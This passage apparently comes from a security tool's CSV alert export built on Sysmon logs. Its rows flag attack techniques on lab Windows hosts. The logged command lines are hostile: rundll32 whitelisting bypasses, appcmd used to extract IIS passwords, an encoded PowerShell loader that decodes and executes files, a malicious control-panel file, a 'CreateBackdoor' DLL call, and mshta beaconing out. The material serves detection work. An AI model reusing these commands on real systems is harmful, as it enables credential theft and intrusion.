and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka105.inwitelecom.net ) , IP ( 105.73.6.105 ) and port ( 80 )",3," 3 5 4 3 0 0x8000000000000000 4132 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-21 06:58:40.721 365ABB72-1A29-5CE4-0000-001079F92101 2432 C:\Windows\System32\mshta.exe IEWIN7\IEUser tcp true false 10.0.2.15 IEWIN7..home 49705 false 105.73.6.105 aka105.inwitelecom.net 80 http ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 1019 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-23 17:26:09.417 365ABB72-D7B1-5CE6-0000-00102CD76D00 2240 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" D:\ IEWIN7\IEUser 365ABB72-CE6C-5CE6-0000-002047F30000 0xf347 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-D7B0-5CE6-0000-001077C56D00 3388 \\vboxsrv\HTools\msxsl.exe msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe)",1," 1 5 4 1 0 0x8000000000000000 16392 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:33:59.727 365ABB72-20C7-5CD8-0000-001021022500 1416 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2006-5CD8-0000-0010E0912300 2936 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1," 1 5 4 1 0 0x8000000000000000 16392 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:33:59.727 365ABB72-20C7-5CD8-0000-001021022500 1416 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2006-5CD8-0000-0010E0912300 2936 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1," 1 5 4 1 0 0x8000000000000000 16392 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:33:59.727 365ABB72-20C7-5CD8-0000-001021022500 1416 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2006-5CD8-0000-0010E0912300 2936 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557681649.458113,2019-05-12T21:20:49.458113+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe ),1," 1 5 4 1 0 0x8000000000000000 16513 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 17:20:49.261 365ABB72-55F1-5CD8-0000-0010781C3300 2392 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-4FB5-5CD8-0000-0020F2350100 0x135f2 1 Medium SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-55F1-5CD8-0000-00108A153300 3668 C:\Windows\System32\ftp.exe "C:\Windows\System32\ftp.exe" -s:c:\users\ieuser\appdata\local\temp\ftp.txt ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920559.063277,2019-05-27T05:29:19.063277+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," 1 5 4 1 0 0x8000000000000000 5946 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:19.023 365ABB72-3D6F-5CEB-0000-0010A6B1FF00 1508 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",)",1," 1 5 4 1 0 0x8000000000000000 4864 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:11:17.503 747F3D96-60F5-5D3F-0000-0010A8D75500 4884 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", C:\Users\IEUser\Downloads\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-0020B5314100 0x4131b5 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-60F5-5D3F-0000-0010D1CF5500 4356 C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," 1 5 4 1 0 0x8000000000000000 4864 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:11:17.503 747F3D96-60F5-5D3F-0000-0010A8D75500 4884 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", C:\Users\IEUser\Downloads\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-0020B5314100 0x4131b5 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-60F5-5D3F-0000-0010D1CF5500 4356 C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," 1 5 4 1 0 0x8000000000000000 4864 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:11:17.503 747F3D96-60F5-5D3F-0000-0010A8D75500 4884 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", C:\Users\IEUser\Downloads\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-0020B5314100 0x4131b5 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-60F5-5D3F-0000-0010D1CF5500 4356 C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1558452781.141798,2019-05-21T19:33:01.141798+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka112.inwitelecom.net ) , IP ( 105.73.6.112 ) and port ( 80 )",3," 3 5 4 3 0 0x8000000000000000 4131 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-21 06:58:40.518 365ABB72-1A29-5CE4-0000-001079F92101 2432 C:\Windows\System32\mshta.exe IEWIN7\IEUser tcp true false 10.0.2.15 IEWIN7..home 49704 false 105.73.6.112 aka112.inwitelecom.net 80 http ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243532 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:24.985 747F3D96-9F68-5E75-0000-001079652000 3300 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243532 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:24.985 747F3D96-9F68-5E75-0000-001079652000 3300 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243532 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:24.985 747F3D96-9F68-5E75-0000-001079652000 3300 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler calc.exe)",1," 1 5 4 1 0 0x8000000000000000 16391 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:33:37.063 365ABB72-20B1-5CD8-0000-001064D62400 1844 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe url.dll,FileProtocolHandler calc.exe c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2006-5CD8-0000-0010E0912300 2936 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1," 1 5 4 1 0 0x8000000000000000 16391 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:33:37.063 365ABB72-20B1-5CD8-0000-001064D62400 1844 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe url.dll,FileProtocolHandler calc.exe c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2006-5CD8-0000-0010E0912300 2936 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1," 1 5 4 1 0 0x8000000000000000 16391 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:33:37.063 365ABB72-20B1-5CD8-0000-001064D62400 1844 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe url.dll,FileProtocolHandler calc.exe c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2006-5CD8-0000-0010E0912300 2936 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920558.973148,2019-05-27T05:29:18.973148+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:password ),1," 1 5 4 1 0 0x8000000000000000 5943 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:18.933 365ABB72-3D6E-5CEB-0000-0010EFADFF00 2276 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUA